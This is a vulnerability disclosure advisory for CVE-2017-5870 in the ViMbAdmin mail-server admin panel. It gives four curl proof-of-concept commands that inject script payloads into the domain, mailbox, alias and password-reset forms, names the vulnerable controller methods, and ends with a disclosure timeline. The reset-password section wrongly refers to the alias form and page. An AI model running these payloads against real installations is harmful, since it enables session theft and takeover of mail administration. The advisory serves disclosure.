Product Description

ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU/GPL license version 3. The official web site can be found at www.vimbadmin.net.

Details

CVE ID: CVE-2017-5870

Access Vector: remote

Security Risk: high

Vulnerability: CWE-79

CVSS Base Score: 7.2

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Proof of Concept

Domain creation form

Exploit

The domain creation form is vulnerable to a stored XSS vulnerability, through the domain and transport variables:

curl 'http://<ip>/domain/add' -H 'Cookie: VIMBADMIN3=<SESSIONID>;' --data 'domain=testdomain%22%3E%3Cscript%3Ealert%28%27xss domain%27%29%3C%2Fscript%3E&description=none&backupmx=0&active=0&active=1&max_aliases=0&max_mailboxes=0&transport=virtual%22%3E%3Cscript%3Ealert%28%27XSS virtual%27%29%3C%2Fscript%3E' --compressed ;

The payload gets injected inside the http://<ip>/domain/list page.

Vulnerable code

The vulnerable code is located in the addAction() method of the <vimbadmin directory>/application/controllers/DomainController.php file.

Mailbox creation form

Exploit

The mailbox creation form is vulnerable to a stored XSS vulnerability, in the name variable:

curl 'http://<ip>/domain/add/did/<domain id>' -H 'Cookie: VIMBADMIN3=<SESSIONID>' --data 'local_part=test&domain=<domain id>&name=test%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&password=<password>&quota=0&alt_email=&cc_welcome_email='

The payload gets injected inside the http://<ip>/mailbox/list page.

Vulnerable code

The vulnerable code is located in the addAction() method of the <vimbadmin directory>/application/controllers/MailboxController.php file.

Alias creation form

Exploit

The alias creation form is vulnerable to a stored XSS vulnerability, in the goto variable:

curl 'http://<ip>/alias/add/did/<domain id>' -H 'Cookie: VIMBADMIN3=<SESSIONID>' --data 'local_part=test&domain=4&goto%5B%5D=test%40test.com%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E'

The payload gets injected inside the http://<ip>/alias page.

Vulnerable code

The vulnerable code is located in the addAction() method of the <vimbadmin directory>/application/controllers/AliasController.php file.

On reset password page

Exploit

A reflected XSS vulnerability has been found on the alias creation form, using variables captchatext.

curl 'http://<ip>/auth/lost-password' --data 'username=none&captchaid=<captcha id>&requestnewimage=0&captchatext=none%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&login=Reset+Password'

The payload gets injected inside the http://<ip>/alias page.

Vulnerable code

The vulnerable code is located in the _getFormLostPassword() method of the <vimbadmin directory>/application/controllers/AuthController.php file.

Affected version

  • tested on version 3.0.15

Timeline (dd/mm/yyyy)

  • 22/01/2017 : Initial discovery.
  • 16/02/2017 : First contact with opensolutions.io
  • 16/02/2017 : Advisory sent.
  • 24/02/2017 : Reply from the owner, acknowledging the report and planning to fix the vulnerabilities.
  • 13/03/2017 : Sysdream Labs request for an update.
  • 29/03/2017 : Second request for an update.
  • 29/03/2017 : Reply from the owner stating that he has no time to fix the issues.
  • 03/05/2017 : Full disclosure.

Credits

  • Florian NIVETTE, Sysdream (f.nivette -at- sysdream -dot- com)